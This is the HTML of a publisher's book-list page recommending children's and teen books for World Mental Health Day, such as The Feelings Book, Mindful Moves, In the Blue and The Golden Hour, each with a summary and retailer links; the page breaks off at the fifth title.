</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/about-hachette-book-group-2/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About">About</a><span id="expand-site-header__sub-menu-1927446634" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1927446634" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1927446634" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1574366336  desc-arrow-2567843872">
	<title id="titlet-arrow-1574366336">Arrow Icon</title>
	<desc id="desc-arrow-2567843872">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1927446634" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1927446634"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/about-hachette-book-group-2/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About Hachette Book Group">About Hachette Book Group</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/about/careers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Careers">Careers</a></span></li></ul>
</li></ul></nav></div>	
<div class="site-search">
	<form id="global-hbg-search" class="site-search__form" name="search-form" action="https://www.hachettebookgroup.com/">
		<label class="site-search__label" for="search-form-633d99a96c06d">Search</label>
		<span class="site-search_background"></span>
		<input class="site-search__input add-autocomplete" type="search" id="search-form-633d99a96c06d" value="" placeholder="Search" name="s" alt="search input field">
		<button class="site-search__button" aria-label="Search">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.68 38.68" role="img" aria-labelledby="title-search-icon-4287289897  desc-search-icon-3898369429">
	<title id="title-search-icon-4287289897">Search</title>
	<desc id="desc-search-icon-3898369429">magnifying glass graphic</desc>
	<path d="M37.62,32.49,27,21.86A14.54,14.54,0,1,0,21.86,27L32.49,37.62a3.63,3.63,0,1,0,5.13-5.13ZM14.5,25.38A10.88,10.88,0,1,1,25.38,14.5,10.88,10.88,0,0,1,14.5,25.38Z"/></svg>
		</button>
	</form>
</div>
</div>
</header>

<!-- Sitestripe -->
<div class="sitestripe" style="background:#d2e8f0">
	<p style="color:#515050">
		<span>
							<b>
						Use BOOKISH22 for 10% off at checkout! Free shipping on $45+							</b>
					</span>
			</p>
</div>

<!-- Popup Modal -->
<div class="modal-popup site-popup modal fade" id="newsletter_popup" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
  <div class="modal-dialog" role="document">
	<div class="modal-content">
	  <div class="modal-header">
		<button type="button" class="modal-close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
		<h4 class="modal-title"></h4>
	  </div>
			<div class="signup module">
	<div class="module__content">
	<div class="signup__content">
		<p class="newsletter-text">Get recommended reads, deals, and more from Hachette</p>
		<div class="signup__form-wrapper">
			<form class="signup__form">
				<label for="email_address_input" class="screen-reader-text">Get recommended reads, deals, and more from Hachette</label>
				<input id="email_address_input" type="email" name="email_address" class="hachette-input hachette-email" placeholder="Your email address" />
												<button class="newsletter-submit"
					data-type="click-event" data-category="Form Newsletter" data-action="Submit Form" data-label="Submit Newsletter"
				>
					Sign Up				</button>
			</form>
		</div>
	</div>
		<p class="signup__legal">
			By clicking ‘Sign Up,’ I acknowledge that I have read and agree to Hachette Book Group’s 			<a href="https://www.hachettebookgroup.com/terms-and-policies/privacy-policy/">Privacy Policy</a>
			 and 			<a href="https://www.hachettebookgroup.com/terms-and-policies/terms-of-use/">Terms of Use</a>
		</p>
	</div>
</div>
	</div>
  </div>
</div>
<div class="modal-popup site-popup mailchimp-options modal fade" id="mailchimp_options_popup" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
	<button type="button" class="modal-close mailchimp-modal-close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
	<form>
		<div id="mc_embed_signup_scroll">
			<div class="mc-field-group">
				<input type="email" value="" name="EMAIL" class="required email" id="mce-EMAIL">
			</div>
			<h2 class="mailchimp-options__header">Thanks for signing up!</h2>
			<p class="mailchimp-options__header-small">Now, tell us what you like to read.</p>
			<div class="input-group-container">

				<div class="mc-field-group input-group">
					<h3 class="mailchimp-options__sub-header">Newsletters</h3>
					<ul class="mailchimp-options__interest-groups">
						<li><input type="checkbox" value="7860e51d31" name="Christian"><label>Christian (Faithwords)</label></li>
						<li><input type="checkbox" value="1b0133104b" name="Romance"><label>Romance (Forever)</label></li>
						<li><input type="checkbox" value="685d0c532e" name="Mystery"><label>Mystery &amp; Thriller (Novel Suspects)</label></li>
						<li><input type="checkbox" value="1b749b6db0" name="Young"><label>Young Adult (Novl)</label></li>
						<li><input type="checkbox" value="3a28b93c6f" name="Science"><label>Science Fiction (Orbit)</label></li>
						<li><input type="checkbox" value="d0ca99f338" name="Travel"><label>Travel (Moon)</label></li>
						<li><input type="checkbox" value="e36ec4213a" name="Deals"><label>Deals</label></li>
						<li><input type="checkbox" value="f517c289cf" name="Childrens Books"><label>Children&#039;s Books (Family Reads)</label></li>
						<li><input type="checkbox" value="6824b13175" name="Virtual Author Events"><label>Virtual Author Events</label></li>
						<li><input type="checkbox" value="27b332daad" name="LB School & Library"><label>Little, Brown School &amp; Library</label></li>
						<li><input type="checkbox" value="be306ee257" name="Author Spotlights"><label>Author Spotlights</label></li>
					</ul>
				</div>
				<div class="mc-field-group input-group">
					<h3 class="mailchimp-options__sub-header">Genre Preferences</h3>
					<ul class="mailchimp-options__interest-groups">
						<li><input type="checkbox" value="472b302a2d" name="Audiobooks"><label>Audiobooks</label></li>
						<li><input type="checkbox" value="4a44336e04" name="Biography"><label>Biography &amp; Memoir</label></li>
						<li><input type="checkbox" value="5b40865621" name="Book"><label>Book Clubs</label></li>
						<li><input type="checkbox" value="00af569508" name="Business"><label>Business</label></li>
						<li><input type="checkbox" value="7312408386" name="Cooking"><label>Cooking</label></li>
						<li><input type="checkbox" value="4910abfa81" name="Politics"><label>Politics</label></li>
						<li><input type="checkbox" value="dc1faf273d" name="Fiction"><label>Fiction</label></li>
						<li><input type="checkbox" value="9e88d9c708" name="Health"><label>Health &amp; Wellness</label></li>
						<li><input type="checkbox" value="6b7c878b27" name="History"><label>History</label></li>
						<li><input type="checkbox" value="60ca58a11e" name="Entertainment"><label>Entertainment</label></li>
					</ul>
				</div>
			</div>
			<div id="mce-responses" class="clear">
				<div class="response" id="mce-error-response" style="display:none"></div>
				<div class="response" id="mce-success-response" style="display:none"></div>
			</div>
			<div class="clear mailchimp-options__submit-button">
				<input type="submit" value="Submit" name="subscribe" id="mc-embedded-subscribe" class="button">
			</div>
			<p class="mailchimp-options__response-text"></p>
			<button type="button" class="mailchimp-modal-close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
		</div>
	</form>
</div>

<!-- Cart -->
<section class="drawer" id="flyout-cart" data-drawer-target aria-expanded="false">
	<div class="drawer__overlay" data-drawer-close tabindex="-1"></div>
	<div class="drawer__wrapper">
			<div class="drawer__header">
					<div class="drawer__title"><h2>Shopping Cart</h2></div>
					<button class="drawer__close" data-drawer-close aria-label="Close Cart">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 320 512"><!--! Font Awesome Pro 6.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright 2022 Fonticons, Inc. --><path d="M310.6 361.4c12.5 12.5 12.5 32.75 0 45.25C304.4 412.9 296.2 416 288 416s-16.38-3.125-22.62-9.375L160 301.3L54.63 406.6C48.38 412.9 40.19 416 32 416S15.63 412.9 9.375 406.6c-12.5-12.5-12.5-32.75 0-45.25l105.4-105.4L9.375 150.6c-12.5-12.5-12.5-32.75 0-45.25s32.75-12.5 45.25 0L160 210.8l105.4-105.4c12.5-12.5 32.75-12.5 45.25 0s12.5 32.75 0 45.25l-105.4 105.4L310.6 361.4z"/></svg>
</button>
			</div>
			<div class="drawer__content">
				<div id="shopping-cart-component" class="shopping-cart-component"></div>
			</div>
	</div>
</section>
			<div id="content" class="site__content wp-blocks">
				
<main class="">
	<article class="article-content__wrapper">
		<div class="article-content__main-body">
			<header class="post__header">
				<h1>8 Books for World Mental Health Day</h1>
			</header>

			
							<header class="post__meta">
					<span class="post__byline">
											</span>
				</header>
			
				<div class="post__content">
					
<p>World Mental Health Day is marked every year on October 10th to raise awareness about mental health around the world and to mobilize efforts to support those experiencing mental health issues. It may be difficult to address mental health, especially for children,  so here is a list of books for younger kids, older kids, teens, and even a journal for anyone to help approach a vital part of our health.</p>
<p>&nbsp;</p>

<div class="featured-title v2" id="title-9780316012492">
	<div class="featured-title__cover">
		<a href="https://www.hachettebookgroup.com/titles/todd-parr/the-feelings-book/9780316012492/" alt="The Feelings Book">
			<img width="190" height="190" src="" class="lazyload orientation-square" alt="The Feelings Book" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2019/08/9780316012492-1.jpg?fit=190%2C190" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.hachettebookgroup.com/titles/todd-parr/the-feelings-book/9780316012492/" alt="The Feelings Book">
							The Feelings Book						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.hachettebookgroup.com/contributor/todd-parr/" class="title-header__author"><span>Todd Parr</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><I>Sometimes I feel silly.<br>Sometimes I feel like eating pizza for breakfast.<br>Sometimes I feel brave.<br>Sometimes I feel like trying something new...<br><br>The Feelings Book </I>vibrantly illustrates the wide range of moods we all experience. Kids and adults will appreciate Todd Parr's quirky intelligence as he pays special attention to the ever-changing, sometimes nonsensical emotions that we all feel. Targeted to young children first beginning to read, this book will inspire kids to discuss their multitude of feelings in a kid-friendly, accessible format, told through Parr's trademark bold, bright colors and silly scenes.<br><br></p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Board book</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2561128021  desc-arrow-2255119522">
	<title id="titlet-arrow-2561128021">Arrow Icon</title>
	<desc id="desc-arrow-2255119522">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.hachettebookgroup.com/titles/todd-parr/the-feelings-book/9780316186933/">
						ebook <span class="title-header__dropdown-format">Digital original</span>					</a>
				</li>
							<li>
					<a href="https://www.hachettebookgroup.com/titles/todd-parr/the-feelings-book-el-libro-de-los-sentimientos/9780316541831/">
						Trade Paperback <span class="title-header__dropdown-format">Bilingual edition</span>					</a>
				</li>
							<li>
					<a href="https://www.hachettebookgroup.com/titles/todd-parr/the-feelings-book/9780316043465/">
						Trade Paperback					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-850807956  desc-arrow-1642511424">
	<title id="titlet-arrow-850807956">Arrow Icon</title>
	<desc id="desc-arrow-1642511424">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/0316012491?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9780316012492"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9780316012492"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9780316012492"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9780316012492"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9780316012492/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9780316012492"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9780316012492"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9780316012492"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9781635862713">
	<div class="featured-title__cover">
		<a href="https://www.hachettebookgroup.com/external/title/9781635862713/" alt="Mindful Moves">
			<img alt="Mindful Moves" class="lazyload" data-src="https://ext-images.hachettebookgroup.com/9781635862713/190x285" src="" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.hachettebookgroup.com/external/title/9781635862713/" alt="Mindful Moves">
							Mindful Moves						</a>
					</h3>

											<h4 class="title-header__byline">Nicole Cardoza</h4>
									</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><p>Mindfulness is proven to boost children’s physical, mental, and socio-emotional development, but establishing the practice requires making it a part of daily life. With delightful illustrations and kid-friendly language, <i>Mindful Moves </i>introduces kids to simple mindfulness activities that are fun, easy to remember, and available for kids to turn to any time the need arises, no matter where they are. </p>
<p>Check Your Inner Weather encourages children to tune into how they feel in the moment and accept their feelings without judgement. Pose like a Superhero helps fill kids with inner strength and confidence, while Breathe like a Walrus helps them channel frustration or anger through breath and facial relaxation.</p>
<p>Each of the meditation, mindfulness, yoga, and movement activities is designed to help kids stay calm, be present, and feel focused and happy. Whether it’s before a busy day at school, in the backseat of the car, during a test, or heading off to bed, this is a guide kids can refer to again and again!<br /> </p></p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<span class="btn btn-inverse btn-empty">
			<meta itemprop="bookFormat" content="Trade Cloth"/>
			Hardcover		</span>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2301580064  desc-arrow-3473123545">
	<title id="titlet-arrow-2301580064">Arrow Icon</title>
	<desc id="desc-arrow-3473123545">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/163586271X?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781635862713"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781635862713"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9781635862713"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9781635862713"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9781635862713/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9781635862713"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9781635862713"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9781635862713"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9780316497626">
	<div class="featured-title__cover">
		<a href="https://www.hachettebookgroup.com/titles/erin-hourigan/in-the-blue/9780316497626/" alt="In the Blue">
			<img width="190" height="190" src="" class="lazyload orientation-square" alt="In the Blue" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2021/09/9780316497626.jpg?fit=190%2C190" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.hachettebookgroup.com/titles/erin-hourigan/in-the-blue/9780316497626/" alt="In the Blue">
							In the Blue						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.hachettebookgroup.com/contributor/erin-hourigan/" class="title-header__author"><span>Erin Hourigan</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><P><B>An emotional and tender picture book that accessibly explores depression within a family, through the use of color.</B><BR /><BR /><I>I&#039;ve always been my dad&#039;s little sunspot.<BR />But one day, his world was no longer bright and yellow&mdash;it was a deep, dark blue.</I><BR /><BR />As one father embarks on an emotional journey, his daughter will navigate life lived in and around his depression. Most days the sun won&rsquo;t be able to peek through the clouds. But with each new wave of change, love will always bond them together.</P><P>This poignant and important story, with its use of color to indicate the ups and downs of one family&#039;s emotions, is an accessible way to discuss mental illness with young readers.</P></p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<span class="btn btn-inverse btn-empty">
			<meta itemprop="bookFormat" content="Hardcover"/>
			Hardcover		</span>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2177566939  desc-arrow-652047599">
	<title id="titlet-arrow-2177566939">Arrow Icon</title>
	<desc id="desc-arrow-652047599">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/0316497622?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9780316497626"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9780316497626"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9780316497626"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9780316497626"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9780316497626/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9780316497626"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9780316497626"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9780316497626"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9780316540339">
	<div class="featured-title__cover">
		<a href="https://www.hachettebookgroup.com/titles/niki-smith/the-golden-hour/9780316540339/" alt="The Golden Hour">
			<img width="186" height="285" src="" class="lazyload orientation-portrait" alt="The Golden Hour" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2021/11/9780316540339.jpg?fit=186%2C285" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.hachettebookgroup.com/titles/niki-smith/the-golden-hour/9780316540339/" alt="The Golden Hour">
							The Golden Hour						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.hachettebookgroup.com/contributor/niki-smith/" class="title-header__author"><span>Niki Smith</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><DIV><B>A&#160;<I>Kirkus&#039;s</I>&#160;Best Middle Grade Books&#160;of 2021 Pick</B><BR /><BR /><B>From the author of <I>The Deep &amp; Dark Blue</I> comes a tender graphic novel, perfect for our time,&#160;that gently explores themes of self-discovery, friendship, healing from tragedy, and hope for a better tomorrow.</B><BR /><BR />Struggling with anxiety after witnessing a harrowing instance of gun violence, Manuel Soto copes through photography, using his cell-phone camera to find anchors that keep him grounded. His days are a lonely, latchkey monotony until he&#039;s teamed with his classmates, Sebastian and Caysha, for a group project.<BR /><BR />Sebastian lives on a grass-fed cattle farm outside of town, and Manuel finds solace in the open fields and in the antics of the newborn calf Sebastian is hand-raising. As Manuel&#160;aides his new friends in their preparations for the local county&#160;fair, he&#160;learns to open up, confronts his deepest fears, and even finds first love.<BR /><BR /><B>This title will be simultaneously available in paperback.</B></DIV></p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Trade Paperback</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-532943661  desc-arrow-3911213250">
	<title id="titlet-arrow-532943661">Arrow Icon</title>
	<desc id="desc-arrow-3911213250">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.hachettebookgroup.com/titles/niki-smith/the-golden-hour/9780316540315/">
						ebook					</a>
				</li>
							<li>
					<a href="https://www.hachettebookgroup.com/titles/niki-smith/the-golden-hour/9780316540377/">
						Hardcover					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3602318442  desc-arrow-553200380">
	<title id="titlet-arrow-3602318442">Arrow Icon</title>
	<desc id="desc-arrow-553200380">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/0316540331?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9780316540339"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9780316540339"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9780316540339"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9780316540339"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9780316540339/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9780316540339"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9780316540339"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9780316540339"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9780316416856">
	<div class="featured-title__cover">
		<a href="https://www.hachettebookgroup.com/titles/stewart-foster/all-the-things-that-could-go-wrong/9780316416856/" alt="All the Things That Could Go Wrong">
